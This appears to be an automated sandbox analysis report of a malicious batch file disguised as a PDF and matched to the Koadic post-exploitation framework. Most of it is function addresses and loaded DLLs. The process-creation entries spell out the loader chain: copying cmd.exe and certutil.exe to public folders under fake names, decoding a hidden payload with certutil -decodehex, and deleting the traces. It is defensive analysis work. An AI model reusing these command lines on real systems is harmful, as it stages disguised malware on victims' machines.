Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2524D47_2_00007FF6AA2524D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1EC5207_2_00007FF6AA1EC520
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E81707_2_00007FF6AA1E8170
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2001407_2_00007FF6AA200140
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26A1E87_2_00007FF6AA26A1E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23C1D07_2_00007FF6AA23C1D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A821C7_2_00007FF6AA2A821C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2F41F87_2_00007FF6AA2F41F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C42747_2_00007FF6AA2C4274
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23E29C7_2_00007FF6AA23E29C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20227C7_2_00007FF6AA20227C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2562807_2_00007FF6AA256280
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D67507_2_00007FF6AA2D6750
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26C7F07_2_00007FF6AA26C7F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2907D07_2_00007FF6AA2907D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2627D07_2_00007FF6AA2627D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D28547_2_00007FF6AA2D2854
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26E8447_2_00007FF6AA26E844
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C08C87_2_00007FF6AA2C08C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C48C47_2_00007FF6AA2C48C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2185707_2_00007FF6AA218570
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24655C7_2_00007FF6AA24655C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B45387_2_00007FF6AA2B4538
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D85A87_2_00007FF6AA2D85A8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27E57C7_2_00007FF6AA27E57C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2325807_2_00007FF6AA232580
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F05E07_2_00007FF6AA1F05E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E85EC7_2_00007FF6AA2E85EC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AC6307_2_00007FF6AA2AC630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2486307_2_00007FF6AA248630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24C6D07_2_00007FF6AA24C6D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25C6F87_2_00007FF6AA25C6F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA277B747_2_00007FF6AA277B74
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28FB507_2_00007FF6AA28FB50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E5BA47_2_00007FF6AA1E5BA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1EFB847_2_00007FF6AA1EFB84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA251B847_2_00007FF6AA251B84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24DBF07_2_00007FF6AA24DBF0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA209BC87_2_00007FF6AA209BC8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23FC347_2_00007FF6AA23FC34
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21FC207_2_00007FF6AA21FC20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA293C107_2_00007FF6AA293C10
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA233C607_2_00007FF6AA233C60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FBCA47_2_00007FF6AA1FBCA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2EFC907_2_00007FF6AA2EFC90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA261C907_2_00007FF6AA261C90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23BCE87_2_00007FF6AA23BCE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA219CD07_2_00007FF6AA219CD0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A9CC07_2_00007FF6AA2A9CC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21DD207_2_00007FF6AA21DD20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F5D087_2_00007FF6AA1F5D08
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D994C7_2_00007FF6AA2D994C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D79387_2_00007FF6AA2D7938
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2619AC7_2_00007FF6AA2619AC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26F9907_2_00007FF6AA26F990
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20F9B87_2_00007FF6AA20F9B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E1A107_2_00007FF6AA1E1A10
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA231A607_2_00007FF6AA231A60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA299A587_2_00007FF6AA299A58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25BA487_2_00007FF6AA25BA48
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA213A407_2_00007FF6AA213A40
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F7AB47_2_00007FF6AA1F7AB4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA247AC87_2_00007FF6AA247AC8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2ABB287_2_00007FF6AA2ABB28
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E1F807_2_00007FF6AA1E1F80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2480187_2_00007FF6AA248018
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA299FF87_2_00007FF6AA299FF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B20847_2_00007FF6AA2B2084
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2180807_2_00007FF6AA218080
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24C0B87_2_00007FF6AA24C0B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA297D707_2_00007FF6AA297D70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA239D6C7_2_00007FF6AA239D6C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA241D707_2_00007FF6AA241D70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27BDA07_2_00007FF6AA27BDA0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2EDD847_2_00007FF6AA2EDD84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F1DE87_2_00007FF6AA1F1DE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA271E2C7_2_00007FF6AA271E2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA215DF77_2_00007FF6AA215DF7
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26BE707_2_00007FF6AA26BE70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26DEB07_2_00007FF6AA26DEB0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23DEA47_2_00007FF6AA23DEA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA269EE47_2_00007FF6AA269EE4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA231ED07_2_00007FF6AA231ED0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA275F047_2_00007FF6AA275F04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20B36C7_2_00007FF6AA20B36C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2173407_2_00007FF6AA217340
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2CB3AC7_2_00007FF6AA2CB3AC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E33D47_2_00007FF6AA2E33D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D33D07_2_00007FF6AA2D33D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22F4347_2_00007FF6AA22F434
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E73F87_2_00007FF6AA1E73F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25D4107_2_00007FF6AA25D410
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28D4607_2_00007FF6AA28D460
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E54387_2_00007FF6AA1E5438
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22D4407_2_00007FF6AA22D440
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2054A07_2_00007FF6AA2054A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D94A87_2_00007FF6AA2D94A8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2994947_2_00007FF6AA299494
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2474787_2_00007FF6AA247478
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B14F07_2_00007FF6AA2B14F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25F5207_2_00007FF6AA25F520
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26F1687_2_00007FF6AA26F168
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2331E07_2_00007FF6AA2331E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2311C87_2_00007FF6AA2311C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FD1B87_2_00007FF6AA1FD1B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BD2B47_2_00007FF6AA2BD2B4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2952907_2_00007FF6AA295290
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2592D87_2_00007FF6AA2592D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1EF2C07_2_00007FF6AA1EF2C0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23D2C07_2_00007FF6AA23D2C0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2492C47_2_00007FF6AA2492C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2753187_2_00007FF6AA275318
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2637607_2_00007FF6AA263760
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2397907_2_00007FF6AA239790
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FB7887_2_00007FF6AA1FB788
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24D7F07_2_00007FF6AA24D7F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2577C87_2_00007FF6AA2577C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2217D47_2_00007FF6AA2217D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2938207_2_00007FF6AA293820
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2018307_2_00007FF6AA201830
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FF8007_2_00007FF6AA1FF800
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B38747_2_00007FF6AA2B3874
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27D8587_2_00007FF6AA27D858
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27184C7_2_00007FF6AA27184C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2478907_2_00007FF6AA247890
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2358CC7_2_00007FF6AA2358CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21156C7_2_00007FF6AA21156C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21B58C7_2_00007FF6AA21B58C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B95807_2_00007FF6AA2B9580
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2455F07_2_00007FF6AA2455F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2695FC7_2_00007FF6AA2695FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1EF6107_2_00007FF6AA1EF610
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B56607_2_00007FF6AA2B5660
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20D6607_2_00007FF6AA20D660
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2256487_2_00007FF6AA225648
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C36387_2_00007FF6AA2C3638
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2376B07_2_00007FF6AA2376B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29D6A07_2_00007FF6AA29D6A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C76787_2_00007FF6AA2C7678
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2976787_2_00007FF6AA297678
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26F6D87_2_00007FF6AA26F6D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BD6DC7_2_00007FF6AA2BD6DC
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48AA5410_2_00007FF7CD48AA54
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD49555410_2_00007FF7CD495554
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD488DF810_2_00007FF7CD488DF8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD49785410_2_00007FF7CD497854
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4937D810_2_00007FF7CD4937D8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48341010_2_00007FF7CD483410
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD490A6C10_2_00007FF7CD490A6C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4AEE8810_2_00007FF7CD4AEE88
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48E68010_2_00007FF7CD48E680
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4AAA3010_2_00007FF7CD4AAA30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD484A3010_2_00007FF7CD484A30
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF7CD493448 appears 72 times
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF7CD49081C appears 36 times
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF7CD49498C appears 40 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA2A7D70 appears 35 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA2F64A6 appears 173 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA2A7BAC appears 34 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA29ABFC appears 818 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA27EB98 appears 93 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA21BC9C appears 280 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA2EF1B8 appears 183 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA2EF11C appears 37 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA2A0D10 appears 181 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF6AA1ED1C8 appears 41 times
Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLE | Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engine | Classification label: mal76.bank.evad.winBAT@20/8@0/0
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4832B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4AFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA204B68 SysAllocString,#357,SysAllocString,VariantInit,CoInitializeEx,CoCreateInstance,VariantInit,#357,OpenEventW,GetLastError,#359,OpenEventW,GetLastError,#359,PulseEvent,GetLastError,#357,CloseHandle,CoUninitialize,SysFreeString,SysFreeString
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2A6320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Source: C:\Windows\System32\extrac32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe | Section loaded: profapi.dll
Source: 1x40 CONTAINER.PDF-.bat | Static file information: File size 3675586 > 1048576
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: alpha.exe.3.dr | Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Source: alpha.exe.3.dr | Static PE information: section name: .didat
Source: kn.exe.5.dr | Static PE information: section name: .didat
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA213668 push rsp; ret 7_2_00007FF6AA213669
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe

Boot Survival

Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\alpha.exe | API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe | API coverage: 8.5 %
Source: C:\Users\Public\kn.exe | API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe | API coverage: 9.6 %
Source: C:\Users\Public\alpha.exe | API coverage: 8.7 %
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2C6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357
